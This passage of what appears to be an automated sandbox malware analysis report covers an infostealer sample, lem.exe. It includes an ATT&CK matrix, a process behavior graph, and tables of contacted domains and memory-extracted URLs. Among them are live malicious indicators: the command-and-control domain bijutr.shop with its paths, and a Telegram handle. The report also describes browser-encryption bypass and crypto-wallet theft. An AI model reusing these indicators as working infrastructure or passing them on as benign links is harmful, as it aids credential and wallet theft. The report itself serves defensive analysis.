                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581175 Sample: lem.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 59 bijutr.shop 2->59 61 t.me 2->61 63 sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ 2->63 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 7 other signatures 2->91 10 lem.exe 18 2->10         started        12 msedge.exe 2->12         started        14 msedge.exe 2->14         started        signatures3 process4 process5 16 cmd.exe 2 10->16         started        20 msedge.exe 12->20         started        23 msedge.exe 12->23         started        25 msedge.exe 12->25         started        27 msedge.exe 14->27         started        dnsIp6 55 C:\Users\user\AppData\Local\...\Inf.com, PE32 16->55 dropped 83 Drops PE files with a suspicious file extension 16->83 29 Inf.com 32 16->29         started        34 cmd.exe 1 16->34         started        36 cmd.exe 2 16->36         started        38 9 other processes 16->38 65 18.164.116.98, 443, 49995 MIT-GATEWAYSUS United States 20->65 67 sb.scorecardresearch.com 18.165.220.57, 443, 49937 MIT-GATEWAYSUS United States 20->67 69 18 other IPs or domains 20->69 file7 signatures8 process9 dnsIp10 73 bijutr.shop 188.245.216.205, 443, 49756, 49762 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 29->73 75 t.me 149.154.167.99, 443, 49750 TELEGRAMRU United Kingdom 29->75 77 127.0.0.1 unknown unknown 29->77 57 C:\ProgramData\9HDT0HDBIMOZ\68QI5X, PE32+ 29->57 dropped 95 Attempt to bypass Chrome Application-Bound Encryption 29->95 97 Found many strings related to Crypto-Wallets (likely being stolen) 29->97 99 Found API chain indicative of sandbox detection 29->99 101 4 other signatures 29->101 40 msedge.exe 2 10 29->40         started        43 msedge.exe 29->43         started        45 chrome.exe 8 29->45         started        file11 signatures12 process13 dnsIp14 93 Monitors registry run keys for changes 40->93 48 msedge.exe 40->48         started        50 msedge.exe 43->50         started        79 192.168.2.5, 443, 49209, 49703 unknown unknown 45->79 81 239.255.255.250 unknown Reserved 45->81 52 chrome.exe 45->52         started        signatures15 process16 dnsIp17 71 www.google.com 142.250.181.68, 443, 49802, 49804 GOOGLEUS United States 52->71

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                lem.exe11%VirustotalBrowse
                lem.exe5%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\9HDT0HDBIMOZ\68QI5X0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://bijutr.shop/e3f100%Avira URL Cloudmalware
                https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
                https://bijutr.shop/bx100%Avira URL Cloudmalware
                https://bijutr.shophhhv.default-release_cookies.dbta0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bijutr.shop
                		188.245.216.205
                		truetrue
                  		unknown
                  chrome.cloudflare-dns.com
                  		162.159.61.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		18.165.220.57
                        		truefalse
                          		high
                          www.google.com
                          		142.250.181.68
                          		truefalse
                            		high
                            s-part-0035.t-0009.t-msedge.net
                            		13.107.246.63
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.181.65
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  bzib.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    assets.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        c.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          ntp.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            api.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279301810&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high
                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279303519&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                  		high
                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279302807&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                    		high
                                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279295838&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                      		high
                                                      https://sb.scorecardresearch.com/b?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabInf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drfalse
                                                          		high
                                                          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bijutr.shop/e3fInf.com, 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://duckduckgo.com/ac/?q=Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drfalse
                                                              		high
                                                              https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000011.00000002.2693162053.000051D800098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.google.com/document/Jchrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000011.00000002.2695336464.000051D8006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696111849.000051D8008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ntp.msn.com/_defaultQuotaManager.27.drfalse
                                                                          		high
                                                                          http://anglebug.com/4633chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://anglebug.com/7382chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com/s/notifications/manifest/cr_install.htmlaultchrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drfalse
                                                                                  		high
                                                                                  https://issuetracker.google.com/284462263msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.drfalse
                                                                                      		high
                                                                                      https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneQchrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.2615532276.000051D8010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2613239460.000051D800F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616293329.000051D8010E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616126954.000051D800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617923428.000051D800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618046250.000051D800F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2615959644.000051D801118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617969978.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617902560.000051D800CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docs.google.com/manifest.json0.27.drfalse
                                                                                              		high
                                                                                              https://docs.google.com/document/:chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000011.00000002.2696726646.000051D800A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693279241.000051D8000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7714chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://bijutr.shophhhv.default-release_cookies.dbtaInf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://unisolated.invalid/chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.google.com/chrome/tips/chrome.exe, 00000011.00000002.2698312359.000051D800E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696190907.000051D8008F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive.google.com/?lfhs=2chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/6248chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://drive.google.com/?lfhs=2ation.Resultchrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/9Kchrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/6929chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/5281chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.youtube.com/?feature=ytcachrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://bijutr.shop/bxInf.com, 0000000D.00000002.3277051984.00000000044FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            https://docs.googl0chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://issuetracker.google.com/255411748msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://anglebug.com/7246chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://anglebug.com/7369chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://anglebug.com/7489chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.google.com/presentation/chrome.exe, 00000011.00000002.2699355988.000051D8011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://duckduckgo.com/?q=chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://chrome.google.com/webstorechrome.exe, 00000011.00000003.2611828132.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://drive-daily-2.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.2615532276.000051D8010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2613239460.000051D800F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616293329.000051D8010E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616126954.000051D800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617923428.000051D800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618046250.000051D800F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2615959644.000051D801118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617969978.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617902560.000051D800CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 00000011.00000003.2644901617.000051D802338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644868444.000051D802334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644766927.000051D802330000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://t.me/k04aelm0nk3Mozilla/5.0Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.autoitscript.com/autoit3/XInf.com, 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp, Silicon.9.dr, Inf.com.2.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://issuetracker.google.com/161903006msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.ecosia.org/newtab/chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, 0ZC2DB.13.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://drive-daily-1.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.youtube.com/chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://drive-daily-5.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
